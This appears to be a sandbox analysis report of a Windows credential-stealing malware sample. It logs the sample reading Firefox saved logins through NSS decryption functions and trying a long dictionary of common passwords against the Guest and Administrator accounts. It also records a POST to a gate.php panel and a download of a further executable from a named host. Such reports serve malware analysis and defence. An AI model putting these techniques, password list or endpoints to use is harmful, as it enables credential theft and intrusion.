| Get Address | c:\program files\mozilla firefox\nss3.dll | function = SECITEM_FreeItem, address_out = 0x6de6e656 |
|
2 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = PK11_GetInternalKeySlot, address_out = 0x6de03c51 |
|
2 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = PK11_Authenticate, address_out = 0x6dded3ca |
|
2 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = PK11SDR_Decrypt, address_out = 0x6de000a7 |
|
2 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = PK11_FreeSlot, address_out = 0x6de03333 |
|
2 | |
| Get Address | c:\windows\system32\shell32.dll | function = ShellExecuteA, address_out = 0x769e7078 |
|
1 | |
| Create Mapping | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite | filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Create Mapping | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite | filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
2 | |
| Create Mapping | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite | filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Create Mapping | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite | filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Create Mapping | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite | filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Create Mapping | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite | filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Create Mapping | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite | filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Map | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite | process_name = c:\users\eebsym5\desktop\3838612080743901967.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Map | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite | process_name = c:\users\eebsym5\desktop\3838612080743901967.exe, desired_access = FILE_MAP_READ |
|
2 | |
| Map | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite | process_name = c:\users\eebsym5\desktop\3838612080743901967.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Map | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite | process_name = c:\users\eebsym5\desktop\3838612080743901967.exe, desired_access = FILE_MAP_READ |
|
2 | |
| Map | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite | process_name = c:\users\eebsym5\desktop\3838612080743901967.exe, desired_access = FILE_MAP_READ |
|
2 |
User (285)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeImpersonatePrivilege, luid = 29 |
|
4 | |
| Lookup Privilege | privilege = SeTcbPrivilege, luid = 7 |
|
4 | |
| Lookup Privilege | privilege = SeChangeNotifyPrivilege, luid = 23 |
|
4 | |
| Lookup Privilege | privilege = SeCreateTokenPrivilege, luid = 2 |
|
4 | |
| Lookup Privilege | privilege = SeBackupPrivilege, luid = 17 |
|
4 | |
| Lookup Privilege | privilege = SeRestorePrivilege, luid = 18 |
|
4 | |
| Lookup Privilege | privilege = SeIncreaseQuotaPrivilege, luid = 5 |
|
4 | |
| Lookup Privilege | privilege = SeAssignPrimaryTokenPrivilege, luid = 3 |
|
4 | |
| Logon | user_name = Guest, password = Guest |
|
1 | |
| Logon | user_name = Guest, password = guest |
|
1 | |
| Logon | user_name = Guest, password = 123456 |
|
1 | |
| Logon | user_name = Guest, password = password |
|
1 | |
| Logon | user_name = Guest, password = phpbb |
|
1 | |
| Logon | user_name = Guest, password = qwerty |
|
1 | |
| Logon | user_name = Guest, password = 12345 |
|
1 | |
| Logon | user_name = Guest, password = jesus |
|
1 | |
| Logon | user_name = Guest, password = 12345678 |
|
1 | |
| Logon | user_name = Guest, password = 1234 |
|
1 | |
| Logon | user_name = Guest, password = abc123 |
|
1 | |
| Logon | user_name = Guest, password = letmein |
|
1 | |
| Logon | user_name = Guest, password = test |
|
1 | |
| Logon | user_name = Guest, password = love |
|
1 | |
| Logon | user_name = Guest, password = 123 |
|
1 | |
| Logon | user_name = Guest, password = password1 |
|
1 | |
| Logon | user_name = Guest, password = hello |
|
1 | |
| Logon | user_name = Guest, password = monkey |
|
1 | |
| Logon | user_name = Guest, password = dragon |
|
1 | |
| Logon | user_name = Guest, password = trustno1 |
|
1 | |
| Logon | user_name = Guest, password = 111111 |
|
1 | |
| Logon | user_name = Guest, password = iloveyou |
|
1 | |
| Logon | user_name = Guest, password = 1234567 |
|
1 | |
| Logon | user_name = Guest, password = shadow |
|
1 | |
| Logon | user_name = Guest, password = 123456789 |
|
1 | |
| Logon | user_name = Guest, password = christ |
|
1 | |
| Logon | user_name = Guest, password = sunshine |
|
1 | |
| Logon | user_name = Guest, password = master |
|
1 | |
| Logon | user_name = Guest, password = computer |
|
1 | |
| Logon | user_name = Guest, password = princess |
|
1 | |
| Logon | user_name = Guest, password = tigger |
|
1 | |
| Logon | user_name = Guest, password = football |
|
1 | |
| Logon | user_name = Guest, password = angel |
|
1 | |
| Logon | user_name = Guest, password = jesus1 |
|
1 | |
| Logon | user_name = Guest, password = 123123 |
|
1 | |
| Logon | user_name = Guest, password = whatever |
|
1 | |
| Logon | user_name = Guest, password = freedom |
|
1 | |
| Logon | user_name = Guest, password = killer |
|
1 | |
| Logon | user_name = Guest, password = asdf |
|
1 | |
| Logon | user_name = Guest, password = soccer |
|
1 | |
| Logon | user_name = Guest, password = superman |
|
1 | |
| Logon | user_name = Guest, password = michael |
|
1 | |
| Logon | user_name = Guest, password = cheese |
|
1 | |
| Logon | user_name = Guest, password = internet |
|
1 | |
| Logon | user_name = Guest, password = joshua |
|
1 | |
| Logon | user_name = Guest, password = fuckyou |
|
1 | |
| Logon | user_name = Guest, password = blessed |
|
1 | |
| Logon | user_name = Guest, password = baseball |
|
1 | |
| Logon | user_name = Guest, password = starwars |
|
1 | |
| Logon | user_name = Guest, password = 000000 |
|
1 | |
| Logon | user_name = Guest, password = purple |
|
1 | |
| Logon | user_name = Guest, password = jordan |
|
1 | |
| Logon | user_name = Guest, password = faith |
|
1 | |
| Logon | user_name = Guest, password = summer |
|
1 | |
| Logon | user_name = Guest, password = ashley |
|
1 | |
| Logon | user_name = Guest, password = buster |
|
1 | |
| Logon | user_name = Guest, password = heaven |
|
1 | |
| Logon | user_name = Guest, password = pepper |
|
1 | |
| Logon | user_name = Guest, password = 7777777 |
|
1 | |
| Logon | user_name = Guest, password = hunter |
|
1 | |
| Logon | user_name = Guest, password = lovely |
|
1 | |
| Logon | user_name = Guest, password = andrew |
|
1 | |
| Logon | user_name = Guest, password = thomas |
|
1 | |
| Logon | user_name = Guest, password = angels |
|
1 | |
| Logon | user_name = Guest, password = charlie |
|
1 | |
| Logon | user_name = Guest, password = daniel |
|
1 | |
| Logon | user_name = Guest, password = 1111 |
|
1 | |
| Logon | user_name = Guest, password = jennifer |
|
1 | |
| Logon | user_name = Guest, password = single |
|
1 | |
| Logon | user_name = Guest, password = hannah |
|
1 | |
| Logon | user_name = Guest, password = qazwsx |
|
1 | |
| Logon | user_name = Guest, password = happy |
|
1 | |
| Logon | user_name = Guest, password = matrix |
|
1 | |
| Logon | user_name = Guest, password = pass |
|
1 | |
| Logon | user_name = Guest, password = aaaaaa |
|
1 | |
| Logon | user_name = Guest, password = 654321 |
|
1 | |
| Logon | user_name = Guest, password = amanda |
|
1 | |
| Logon | user_name = Guest, password = nothing |
|
1 | |
| Logon | user_name = Guest, password = ginger |
|
1 | |
| Logon | user_name = Guest, password = mother |
|
1 | |
| Logon | user_name = Guest, password = snoopy |
|
1 | |
| Logon | user_name = Guest, password = jessica |
|
1 | |
| Logon | user_name = Guest, password = welcome |
|
1 | |
| Logon | user_name = Guest, password = pokemon |
|
1 | |
| Logon | user_name = Guest, password = iloveyou1 |
|
1 | |
| Logon | user_name = Guest, password = 11111 |
|
1 | |
| Logon | user_name = Guest, password = mustang |
|
1 | |
| Logon | user_name = Guest, password = helpme |
|
1 | |
| Logon | user_name = Guest, password = justin |
|
1 | |
| Logon | user_name = Guest, password = jasmine |
|
1 | |
| Logon | user_name = Guest, password = orange |
|
1 | |
| Logon | user_name = Guest, password = testing |
|
1 | |
| Logon | user_name = Guest, password = apple |
|
1 | |
| Logon | user_name = Guest, password = michelle |
|
1 | |
| Logon | user_name = Guest, password = peace |
|
1 | |
| Logon | user_name = Guest, password = secret |
|
1 | |
| Logon | user_name = Guest, password = 1 |
|
1 | |
| Logon | user_name = Guest, password = grace |
|
1 | |
| Logon | user_name = Guest, password = william |
|
1 | |
| Logon | user_name = Guest, password = iloveyou2 |
|
1 | |
| Logon | user_name = Guest, password = nicole |
|
1 | |
| Logon | user_name = Guest, password = 666666 |
|
1 | |
| Logon | user_name = Guest, password = muffin |
|
1 | |
| Logon | user_name = Guest, password = gateway |
|
1 | |
| Logon | user_name = Guest, password = fuckyou1 |
|
1 | |
| Logon | user_name = Guest, password = asshole |
|
1 | |
| Logon | user_name = Guest, password = hahaha |
|
1 | |
| Logon | user_name = Guest, password = poop |
|
1 | |
| Logon | user_name = Guest, password = blessing |
|
1 | |
| Logon | user_name = Guest, password = blahblah |
|
1 | |
| Logon | user_name = Guest, password = myspace1 |
|
1 | |
| Logon | user_name = Guest, password = matthew |
|
1 | |
| Logon | user_name = Guest, password = canada |
|
1 | |
| Logon | user_name = Guest, password = silver |
|
1 | |
| Logon | user_name = Guest, password = robert |
|
1 | |
| Logon | user_name = Guest, password = forever |
|
1 | |
| Logon | user_name = Guest, password = asdfgh |
|
1 | |
| Logon | user_name = Guest, password = rachel |
|
1 | |
| Logon | user_name = Guest, password = rainbow |
|
1 | |
| Logon | user_name = Guest, password = guitar |
|
1 | |
| Logon | user_name = Guest, password = peanut |
|
1 | |
| Logon | user_name = Guest, password = batman |
|
1 | |
| Logon | user_name = Guest, password = cookie |
|
1 | |
| Logon | user_name = Guest, password = bailey |
|
1 | |
| Logon | user_name = Guest, password = soccer1 |
|
1 | |
| Logon | user_name = Guest, password = mickey |
|
1 | |
| Logon | user_name = Guest, password = biteme |
|
1 | |
| Logon | user_name = Guest, password = hello1 |
|
1 | |
| Logon | user_name = Guest, password = eminem |
|
1 | |
| Logon | user_name = Guest, password = dakota |
|
1 | |
| Logon | user_name = Guest, password = samantha |
|
1 | |
| Logon | user_name = Guest, password = compaq |
|
1 | |
| Logon | user_name = Guest, password = diamond |
|
1 | |
| Logon | user_name = Guest, password = taylor |
|
1 | |
| Logon | user_name = Guest, password = forum |
|
1 | |
| Logon | user_name = Guest, password = john316 |
|
1 | |
| Logon | user_name = Guest, password = richard |
|
1 | |
| Logon | user_name = Guest, password = blink182 |
|
1 | |
| Logon | user_name = Guest, password = peaches |
|
1 | |
| Logon | user_name = Guest, password = cool |
|
1 | |
| Logon | user_name = Guest, password = flower |
|
1 | |
| Logon | user_name = Guest, password = scooter |
|
1 | |
| Logon | user_name = Guest, password = banana |
|
1 | |
| Logon | user_name = Guest, password = james |
|
1 | |
| Logon | user_name = Guest, password = asdfasdf |
|
1 | |
| Logon | user_name = Guest, password = victory |
|
1 | |
| Logon | user_name = Guest, password = london |
|
1 | |
| Logon | user_name = Guest, password = 123qwe |
|
1 | |
| Logon | user_name = Guest, password = 123321 |
|
1 | |
| Logon | user_name = Guest, password = startrek |
|
1 | |
| Logon | user_name = Guest, password = george |
|
1 | |
| Logon | user_name = Guest, password = winner |
|
1 | |
| Logon | user_name = Guest, password = maggie |
|
1 | |
| Logon | user_name = Guest, password = trinity |
|
1 | |
| Logon | user_name = Guest, password = online |
|
1 | |
| Logon | user_name = Guest, password = 123abc |
|
1 | |
| Logon | user_name = Guest, password = chicken |
|
1 | |
| Logon | user_name = Guest, password = junior |
|
1 | |
| Logon | user_name = Guest, password = chris |
|
1 | |
| Logon | user_name = Guest, password = passw0rd |
|
1 | |
| Logon | user_name = Guest, password = austin |
|
1 | |
| Logon | user_name = Guest, password = sparky |
|
1 | |
| Logon | user_name = Guest, password = admin |
|
1 | |
| Logon | user_name = Guest, password = merlin |
|
1 | |
| Logon | user_name = Guest, password = google |
|
1 | |
| Logon | user_name = Guest, password = friends |
|
1 | |
| Logon | user_name = Guest, password = hope |
|
1 | |
| Logon | user_name = Guest, password = shalom |
|
1 | |
| Logon | user_name = Guest, password = nintendo |
|
1 | |
| Logon | user_name = Guest, password = looking |
|
1 | |
| Logon | user_name = Guest, password = harley |
|
1 | |
| Logon | user_name = Guest, password = smokey |
|
1 | |
| Logon | user_name = Guest, password = 7777 |
|
1 | |
| Logon | user_name = Guest, password = joseph |
|
1 | |
| Logon | user_name = Guest, password = lucky |
|
1 | |
| Logon | user_name = Guest, password = digital |
|
1 | |
| Logon | user_name = Guest, password = a |
|
1 | |
| Logon | user_name = Guest, password = thunder |
|
1 | |
| Logon | user_name = Guest, password = spirit |
|
1 | |
| Logon | user_name = Guest, password = bandit |
|
1 | |
| Logon | user_name = Guest, password = enter |
|
1 | |
| Logon | user_name = Guest, password = anthony |
|
1 | |
| Logon | user_name = Guest, password = corvette |
|
1 | |
| Logon | user_name = Guest, password = hockey |
|
1 | |
| Logon | user_name = Guest, password = power |
|
1 | |
| Logon | user_name = Guest, password = benjamin |
|
1 | |
| Logon | user_name = Guest, password = iloveyou! |
|
1 | |
| Logon | user_name = Guest, password = 1q2w3e |
|
1 | |
| Logon | user_name = Guest, password = viper |
|
1 | |
| Logon | user_name = Guest, password = genesis |
|
1 | |
| Logon | user_name = Guest, password = knight |
|
1 | |
| Logon | user_name = Guest, password = qwerty1 |
|
1 | |
| Logon | user_name = Guest, password = creative |
|
1 | |
| Logon | user_name = Guest, password = foobar |
|
1 | |
| Logon | user_name = Guest, password = adidas |
|
1 | |
| Logon | user_name = Guest, password = rotimi |
|
1 | |
| Logon | user_name = Guest, password = slayer |
|
1 | |
| Logon | user_name = Guest, password = wisdom |
|
1 | |
| Logon | user_name = Administrator, password = Administrator |
|
1 | |
| Logon | user_name = Administrator, password = administrator |
|
1 | |
| Logon | user_name = Administrator, password = 123456 |
|
1 | |
| Logon | user_name = Administrator, password = password |
|
1 | |
| Logon | user_name = Administrator, password = phpbb |
|
1 | |
| Logon | user_name = Administrator, password = qwerty |
|
1 | |
| Logon | user_name = Administrator, password = 12345 |
|
1 | |
| Logon | user_name = Administrator, password = jesus |
|
1 | |
| Logon | user_name = Administrator, password = 12345678 |
|
1 | |
| Logon | user_name = Administrator, password = 1234 |
|
1 | |
| Logon | user_name = Administrator, password = abc123 |
|
1 | |
| Logon | user_name = Administrator, password = letmein |
|
1 | |
| Logon | user_name = Administrator, password = test |
|
1 | |
| Logon | user_name = Administrator, password = love |
|
1 | |
| Logon | user_name = Administrator, password = 123 |
|
1 | |
| Logon | user_name = Administrator, password = password1 |
|
1 | |
| Logon | user_name = Administrator, password = hello |
|
1 | |
| Logon | user_name = Administrator, password = monkey |
|
1 | |
| Logon | user_name = Administrator, password = dragon |
|
1 | |
| Logon | user_name = Administrator, password = trustno1 |
|
1 | |
| Logon | user_name = Administrator, password = 111111 |
|
1 | |
| Logon | user_name = Administrator, password = iloveyou |
|
1 | |
| Logon | user_name = Administrator, password = 1234567 |
|
1 | |
| Logon | user_name = Administrator, password = shadow |
|
1 | |
| Logon | user_name = Administrator, password = 123456789 |
|
1 | |
| Logon | user_name = Administrator, password = christ |
|
1 | |
| Logon | user_name = Administrator, password = sunshine |
|
1 | |
| Logon | user_name = Administrator, password = master |
|
1 | |
| Logon | user_name = Administrator, password = computer |
|
1 | |
| Logon | user_name = Administrator, password = princess |
|
1 | |
| Logon | user_name = Administrator, password = tigger |
|
1 | |
| Logon | user_name = Administrator, password = football |
|
1 | |
| Logon | user_name = Administrator, password = angel |
|
1 | |
| Logon | user_name = Administrator, password = jesus1 |
|
1 | |
| Logon | user_name = Administrator, password = 123123 |
|
1 | |
| Logon | user_name = Administrator, password = whatever |
|
1 | |
| Logon | user_name = Administrator, password = freedom |
|
1 | |
| Logon | user_name = Administrator, password = killer |
|
1 | |
| Logon | user_name = Administrator, password = asdf |
|
1 | |
| Logon | user_name = Administrator, password = soccer |
|
1 | |
| Logon | user_name = Administrator, password = superman |
|
1 | |
| Logon | user_name = Administrator, password = michael |
|
1 | |
| Logon | user_name = Administrator, password = cheese |
|
1 | |
| Logon | user_name = Administrator, password = internet |
|
1 | |
| Logon | user_name = Administrator, password = joshua |
|
1 | |
| Logon | user_name = Administrator, password = fuckyou |
|
1 | |
| Logon | user_name = Administrator, password = blessed |
|
1 | |
| Logon | user_name = Administrator, password = baseball |
|
1 | |
| Logon | user_name = Administrator, password = starwars |
|
1 | |
| Logon | user_name = Administrator, password = 000000 |
|
1 | |
| Logon | user_name = Administrator, password = purple |
|
1 | |
| Logon | user_name = Administrator, password = jordan |
|
1 | |
| Logon | user_name = Administrator, password = faith |
|
1 | |
| Logon | user_name = Administrator, password = summer |
|
1 | |
| Logon | user_name = Administrator, password = ashley |
|
1 |
System (507)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Certificate Store | - |
|
1 | |
| Get Time | type = Ticks, time = 129605 |
|
1 | |
| Get Time | type = Ticks, time = 129886 |
|
249 | |
| Get Time | type = Ticks, time = 130151 |
|
249 | |
| Get Time | type = Ticks, time = 139168 |
|
1 | |
| Get Time | type = Ticks, time = 144644 |
|
1 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Hardware Information |
|
1 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
3 |
Ini (14)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Enumerate Sections | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\profiles.ini | data_out = General, size = 65000 |
|
4 | |
| Read | C:\Windows\win.ini | section_name = WS_FTP, key_name = DIR |
|
1 | |
| Read | C:\Windows\win.ini | section_name = WS_FTP, key_name = DEFDIR |
|
1 | |
| Read | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\profiles.ini | section_name = Profile0, key_name = Path, data_out = Profiles/h231daer.default |
|
4 | |
| Read | C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\profiles.ini | section_name = Profile0, key_name = IsRelative, default_value = 1 |
|
4 |
Network Behavior
DNS (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = tnaapparels.com, address_out = 192.95.7.159 |
|
2 |
TCP Sessions (2)
| Information | Value |
|---|---|
| Total Data Sent | 727 bytes |
| Total Data Received | 647 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | 192.95.7.159:80 |
TCP Session #1
| Information | Value |
|---|---|
| Handle | 0x258 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 192.95.7.159 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 49158 |
| Data Sent | 545 bytes |
| Data Received | 151 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 192.95.7.159, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 272, size_out = 272 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 273, size_out = 273 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
131 | |
| Receive | flags = NO_FLAG_SET, size = 2048, size_out = 20 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 2048, size_out = 0 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
TCP Session #2
| Information | Value |
|---|---|
| Handle | 0x258 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 192.95.7.159 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 49158 |
| Data Sent | 182 bytes |
| Data Received | 496 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 192.95.7.159, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 182, size_out = 182 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
164 | |
| Receive | flags = NO_FLAG_SET, size = 332, size_out = 332 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
HTTP Sessions (2)
| Information | Value |
|---|---|
| Total Data Sent | 454 bytes |
| Total Data Received | 496 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | tnaapparels.com |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) |
| Server Name | tnaapparels.com |
| Server Port | 80 |
| Data Sent | 272 |
| Data Received | 0 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = tnaapparels.com, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP/1.0, target_resource = /44/panel/gate.php |
|
1 | |
| Send HTTP Request | headers = content-length: 273, accept-encoding: identity, *;q=0, content-encoding: binary, host: tnaapparels.com, accept: */*, user-agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), connection: close, content-type: application/octet-stream, url = tnaapparels.com/44/panel/gate.php |
|
1 |
HTTP Session #2
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) |
| Server Name | tnaapparels.com |
| Server Port | 80 |
| Data Sent | 182 |
| Data Received | 496 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = tnaapparels.com, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.0, target_resource = /44/panel/44.exe |
|
1 | |
| Send HTTP Request | headers = connection: close, host: tnaapparels.com, accept-encoding: identity, *;q=0, accept: */*, user-agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), url = tnaapparels.com/44/panel/44.exe |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
164 | |
| Read Response | size = 332, size_out = 332 |
|
1 | |
| Close Session | - |
|
1 |
Process #3: cmd.exe
228
0
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd /c ""C:\Users\EEBsYm5\AppData\Local\Temp\18144644.bat" "C:\Users\EEBsYm5\Desktop\3838612080743901967.exe" " |
| Initial Working Directory | C:\Users\EEBsYm5\Desktop\ |
| Monitor | Start Time: 00:01:28, Reason: Child Process |
| Unmonitor | End Time: 00:01:43, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:15 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb34 |
| Parent PID | 0xa4c (c:\users\eebsym5\desktop\3838612080743901967.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B38
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x001cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x00297fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002b0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x004affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000004b0000 | 0x004b0000 | 0x005b0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000005c0000 | 0x005c0000 | 0x011bffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000011c0000 | 0x011c0000 | 0x01322fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| cmd.exe | 0x49fb0000 | 0x49ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winbrand.dll | 0x72e90000 | 0x72e96fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd3000 | 0x7ffd3000 | 0x7ffd3fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (184)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
